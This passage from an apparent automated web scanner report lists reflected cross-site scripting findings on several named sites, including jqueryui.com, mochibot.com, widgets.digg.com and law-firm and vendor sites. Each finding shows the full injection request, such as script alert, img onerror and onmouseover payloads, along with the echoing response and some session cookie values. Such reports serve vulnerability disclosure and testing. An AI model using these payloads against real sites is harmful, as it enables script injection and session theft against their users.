GET /themeroller/css/parseTheme.css.php?ctl=themerollerf2062<script>alert(1)</script>f22eaa1a584&c95d2 HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
Referer: http://jqueryui.com/themeroller/?c95d2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3baa62b01e2=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Apr 2011 20:58:15 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 16605


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themerollerf2062<script>alert(1)</script>f22eaa1a584&c95d2
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea
...[SNIP]...

4.20. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a0ccf<script>alert(1)</script>12010d89495 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&c95d2&a0ccf<script>alert(1)</script>12010d89495=1 HTTP/1.1
Host: jqueryui.com
Proxy-Connection: keep-alive
Referer: http://jqueryui.com/themeroller/?c95d2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3baa62b01e2=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Apr 2011 20:58:15 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 16608


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&c95d2&a0ccf<script>alert(1)</script>12010d89495=1
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .u
...[SNIP]...

4.21. http://mochibot.com/my/core.swf [f parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the f request parameter is copied into the HTML document as plain text between tags. The payload b5679<script>alert(1)</script>d2f3dfe879 was submitted in the f parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/core.swf?mv=8&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3a&l=10301&f=_level0b5679<script>alert(1)</script>d2f3dfe879&sb=remote&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/FCWSite/swfs/covhome_new.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:07:47 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1705
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.52:8890
X-Mochi-Source: 10.0.0.239:5991

FWS.....p...........D.....C....?.........*..........System...
..security.N...allowDomain.R.....this........8....REF..http://www.cov.com/FCWSite/swfs/covhome_new.swf.O......sb..remote.O.6....f.._level0b5679<script>alert(1)</script>d2f3dfe879.O.    ....MV..8.O.    ....SV..9.O......TAG..f0d2fc3a.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R..........UL....f....................
...[SNIP]...

4.22. http://mochibot.com/my/core.swf [mv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the mv request parameter is copied into the HTML document as plain text between tags. The payload 6809b<script>alert(1)</script>3615bf752e4 was submitted in the mv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/core.swf?mv=86809b<script>alert(1)</script>3615bf752e4&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3a&l=10301&f=_level0&sb=remote&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/FCWSite/swfs/covhome_new.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:07:23 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1706
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.51:8890
X-Mochi-Source: 10.0.0.238:6946

FWS.....p...........D.....C....?.........*..........System...
..security.N...allowDomain.R.....this........8....REF..http://www.cov.com/FCWSite/swfs/covhome_new.swf.O......sb..remote.O......f.._level0.O.2....MV..86809b<script>alert(1)</script>3615bf752e4.O.    ....SV..9.O......TAG..f0d2fc3a.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R..........UL....f....................NO....f......
...[SNIP]...

4.23. http://mochibot.com/my/core.swf [sb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the sb request parameter is copied into the HTML document as plain text between tags. The payload 68580<script>alert(1)</script>0f48e44fcb5 was submitted in the sb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/core.swf?mv=8&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3a&l=10301&f=_level0&sb=remote68580<script>alert(1)</script>0f48e44fcb5&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/FCWSite/swfs/covhome_new.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:07:54 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1706
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.50:8890
X-Mochi-Source: 10.0.0.238:22552

FWS.....p...........D.....C....?.........*..........System...
..security.N...allowDomain.R.....this........8....REF..http://www.cov.com/FCWSite/swfs/covhome_new.swf.O.7....sb..remote68580<script>alert(1)</script>0f48e44fcb5.O......f.._level0.O.    ....MV..8.O.    ....SV..9.O......TAG..f0d2fc3a.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R..........UL....f..
...[SNIP]...

4.24. http://mochibot.com/my/core.swf [swfid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mochibot.com
Path:   /my/core.swf

Issue detail

The value of the swfid request parameter is copied into the HTML document as plain text between tags. The payload a37aa<script>alert(1)</script>27710bb0d94 was submitted in the swfid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/core.swf?mv=8&fv=9&v=WIN%2010%2C2%2C154%2C25&swfid=f0d2fc3aa37aa<script>alert(1)</script>27710bb0d94&l=10301&f=_level0&sb=remote&t=1 HTTP/1.1
Host: mochibot.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/FCWSite/swfs/covhome_new.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Mon, 18 Apr 2011 01:07:35 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 1706
Cache-Control: false
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-MochiAds-Server: 38.102.129.22:80
X-Mochi-Backend: 10.0.0.52:8890
X-Mochi-Source: 10.0.0.238:6293

FWS.....p...........D.....C....?.........*..........System...
..security.N...allowDomain.R.....this........8....REF..http://www.cov.com/FCWSite/swfs/covhome_new.swf.O......sb..remote.O......f.._level0.O.    ....MV..8.O.    ....SV..9.O.:....TAG..f0d2fc3aa37aa<script>alert(1)</script>27710bb0d94.O....__mochibot.......mc.O.....mc.............createEmptyMovieClip.N....u..&.......lv.........createEmptyMovieClip.R..........UL....f....................NO....f....................this........    ..9....
...[SNIP]...

4.25. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 41dfa<script>alert(1)</script>421997a1394 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/Users/crawler/Documents/bz-business-xss-report.html41dfa<script>alert(1)</script>421997a1394 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 18 Apr 2011 11:44:18 GMT
Via: NS-CACHE: 100
Etag: "a4c227b786b5e878b80c2c371140d97551e4d5db"
Content-Length: 147
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Mon, 18 Apr 2011 11:54:17 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/Users/crawler/Documents/bz-business-xss-report.html41dfa<script>alert(1)</script>421997a1394", "diggs": 0});

4.26. http://www.arnoldporter.com/industries.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74e88"><script>alert(1)</script>61945f5a1e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries.cfm?u=HomelandSecurity&action=view&id=312&74e88"><script>alert(1)</script>61945f5a1e2=1 HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Referer: http://www.arnoldporter.com/industries.cfm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24313245; CFTOKEN=69495883; sifrFetch=true; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.2.10.1303088780

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:10:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Homeland Security</title>
       <meta name="Description
...[SNIP]...
<input type="hidden" name="74e88"><script>alert(1)</script>61945f5a1e2" value="1" />
...[SNIP]...

4.27. http://www.arnoldporter.com/industries.cfm [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 45217<script>alert(1)</script>d6041dca3d8 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries.cfm?u=HomelandSecurity&action=view&id=312&nsextt=%22%3E%3C/script%3E%3Cscript%3Ealert(9)%3C/script%3E45217<script>alert(1)</script>d6041dca3d8 HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24313245; CFTOKEN=69495883; sifrFetch=true; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.3.10.1303088780

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:12:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Homeland Security</title>
       <meta name="Description
...[SNIP]...
</script>45217<script>alert(1)</script>d6041dca3d8" />
...[SNIP]...

4.28. http://www.arnoldporter.com/industries.cfm [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3db8"><script>alert(1)</script>8c88d7c7546 was submitted in the u parameter. This input was echoed as e3db8\"><script>alert(1)</script>8c88d7c7546 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries.cfm?u=HomelandSecuritye3db8"><script>alert(1)</script>8c88d7c7546&action=view&id=312 HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Referer: http://www.arnoldporter.com/industries.cfm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24313245; CFTOKEN=69495883; sifrFetch=true; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.2.10.1303088780

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:10:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Homeland Security</title>
       <meta name="Description
...[SNIP]...
<input type="hidden" name="u" value="HomelandSecuritye3db8\"><script>alert(1)</script>8c88d7c7546" />
...[SNIP]...

4.29. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f41b"><script>alert(1)</script>34db911561f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?a=bsf_product&5f41b"><script>alert(1)</script>34db911561f=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_tracking_code=bsf_product; path=/
Set-Cookie: locale=+; expires=Mon, 18-Apr-2011 23:17:02 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A0%3A%7B%7D; expires=Wed, 18-May-2011 23:25:22 GMT; path=/
Date: Mon, 18 Apr 2011 23:25:21 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="5f41b"><script>alert(1)</script>34db911561f" value="1" />
...[SNIP]...

4.30. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.barracudanetworks.com
Path:   /ns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4a2"><script>alert(1)</script>81bf7a8d344 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/?a=bsf_product&L=en&8e4a2"><script>alert(1)</script>81bf7a8d344=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: barra_tracking_code=bsf_product; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: barra_tracking_code=bsf_product; path=/
Set-Cookie: locale=+; expires=Mon, 18-Apr-2011 23:16:55 GMT
Set-Cookie: locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; path=/
Set-Cookie: barra_hidden_menus=a%3A0%3A%7B%7D; expires=Wed, 18-May-2011 23:25:15 GMT; path=/
Date: Mon, 18 Apr 2011 23:25:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<input type="hidden" name="8e4a2"><script>alert(1)</script>81bf7a8d344" value="1" />
...[SNIP]...

4.31. http://www.curtis.com/emaildisclaimer.cfm [itemID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The value of the itemID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd71"><img%20src%3da%20onerror%3dalert(1)>d7938553f63 was submitted in the itemID parameter. This input was echoed as 4fd71"><img src=a onerror=alert(1)>d7938553f63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%224fd71"><img%20src%3da%20onerror%3dalert(1)>d7938553f63&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/emailprofessional.cfm?itemID=" onmouseover=prompt(937974) bad="4fd71"><img src=a onerror=alert(1)>d7938553f63&itemType=1&itemname=Curtis%2C%20Mallet%2DPrevost%2C%20Colt%20%26%20Mosle%20LLP%2E">
...[SNIP]...

4.32. http://www.curtis.com/emaildisclaimer.cfm [itemType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The value of the itemType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 228cb"><img%20src%3da%20onerror%3dalert(1)>f1b6cb07108 was submitted in the itemType parameter. This input was echoed as 228cb"><img src=a onerror=alert(1)>f1b6cb07108 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1228cb"><img%20src%3da%20onerror%3dalert(1)>f1b6cb07108 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/emailprofessional.cfm?itemID=" onmouseover=prompt(937974) bad="&itemType=1228cb"><img src=a onerror=alert(1)>f1b6cb07108&itemname=Curtis%2C%20Mallet%2DPrevost%2C%20Colt%20%26%20Mosle%20LLP%2E">
...[SNIP]...

4.33. http://www.curtis.com/sitecontent.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba4dc"><a>a6169c51459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sitecontent.cfm?pageID=64&ba4dc"><a>a6169c51459=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
